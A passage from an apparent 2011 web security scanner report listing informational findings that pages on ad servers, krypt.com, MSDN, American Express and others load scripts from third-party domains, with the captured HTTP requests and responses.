kML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAZwAJT0AK5X5HHeFjM7WcAPevK6xDUElKMQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNp-zZ0C0TcCeJcf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtxE7bubHFUSlRmGJouJjp8ZmJ6qhA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.176. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_160x600.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_160x600.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /content/0/3992/crucial_knows_notebook_160x600.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291151%26AR_C%3D6108747&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html?rtbhost=rts-rr11.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkJ8R0ZCT2liWFhBY3wxMzAzNjU4NDE5MTY5fDF8MEZ3bmdyZnBiQXwwUk5ZbmtnMkVNfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7yIK5YEMImIa-_oXlc_g9IF-8zhv8w&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJOWW5rZzJFTQ&reqid=NERCNDNGQjEwMDAxRUYyMjBBRTU4MTBDMjI2MjFBRkI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:25 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:26 GMT
ETag: "46df29-da5-49d8a8861c880"
Accept-Ranges: bytes
Content-Length: 4437
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-1?mpt=[CACHEBUSTER]" TARGET="_blank">
<IMG SRC=
...[SNIP]...
</script>
<script type="text/javascript" src="http://ar.voicefive.com/bmx3/broker.pli?pid=p90175839&PRAd=3992125865291151&AR_C=6108747"></script>
...[SNIP]...

24.177. http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3992/crucial_knows_notebook_728x90.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:32 GMT
Server: Apache
Last-Modified: Thu, 03 Mar 2011 02:10:32 GMT
ETag: "6744ca-d9b-49d8a88bd5600"
Accept-Ranges: bytes
Content-Length: 4427
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]" TARGET="_blank">
<IMG SRC=
...[SNIP]...
</script>
<script type="text/javascript" src="http://ar.voicefive.com/bmx3/broker.pli?pid=p90175839&PRAd=3992125865291152&AR_C=6108753"></script>
...[SNIP]...

24.178. http://krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:32 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=b90b5be3ebc9fd9d15f94d51bc1066e1; expires=Tue, 24-May-2011 16:34:32 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27975

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
<![endif]-->

   
   <script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.179. http://krypt.com/dedicated/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /dedicated/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dedicated/ HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 26049

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.180. http://krypt.com/go/promos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /go/promos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /go/promos HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 17455

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Promotio
...[SNIP]...
<!-- Start Javascript -->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript" ></script>
   <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js" type="text/javascript" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vpls"></script>
...[SNIP]...

24.181. http://maps.google.com/maps/stk/lc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/stk/lc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /maps/stk/lc?client=ca-pub-8011115638404408&lc_format=map_inset_ad&ll=32.78362%2C-96.818204&spn=0.021792%2C0.025921&z=14&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1303692318%2Cchannel%3A0585047829%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A10.2.154%2Curl%3Ahttp%3A%2F%2Fwww.hellonetwork.com%2Fypsearch.cfm%3Fkw%3Dcredit%2520monitoring%26KID%3D29264%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1303674318536%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1303674311253%2Cdblk%3A1%2Cfrm%3A0%2Cadk%3A1209778470%2Cga_vid%3A1282500417.1303674311%2Cga_sid%3A1303674311%2Cga_hid%3A383501533%2Cga_fc%3A1%2Cga_wpids%3AUA-350746-16%2Cu_tz%3A-300%2Cu_his%3A1%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A9%2Cu_nmime%3A44%2Cbiw%3A1018%2Cbih%3A907%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1
Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.hellonetwork.com/ypsearch.cfm?kw=credit%20monitoring&KID=29264
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=I-kkntLExM1TTzSWRyCwKeEK8o5z0wImIqRngsTZ1f7pPvcoVlw_RvPfaxCnExmyYdaAF09G-fMazzXzLodN-Utpj4hqQcsHLazgtjUOhze8vEcdwKcppf0Keaf3xqTz

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:03:56 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maps-stickers
X-XSS-Protection: 1; mode=block
Content-Length: 11855

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110414/r20110415/measurements.js"></script>
...[SNIP]...

24.182. http://msdn.microsoft.com/en-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /en-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/ HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303556497823:ss=1303555133331; Sto.UserLocale=en-us; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:59:01 GMT
Content-Length: 27577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

24.183. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<!--added for click to call-->

   
    <script type='text/javascript' src='//static.atgsvcs.com/js/atgsvcs.js'></script>
...[SNIP]...

24.184. https://portal.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.actividentity.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: portal.actividentity.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: portal_=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Set-Cookie: portal_hash=deleted; expires=Sat, 24-Apr-2010 20:43:53 GMT; path=/; domain=portal.actividentity.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t1.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

24.185. http://pub.retailer-amazon.net/banner_120_600_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_b.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /banner_120_600_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 655


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
<meta http-equiv="refresh" content="15; URL=banner_120_600_b.php
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.186. http://pub.retailer-amazon.net/banner_728_90_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_b.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /banner_728_90_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 662


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
</head>


<body topmargin="0" leftmargin="0" rightmargin="0" bo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24.187. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 12:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.801362.0XMC
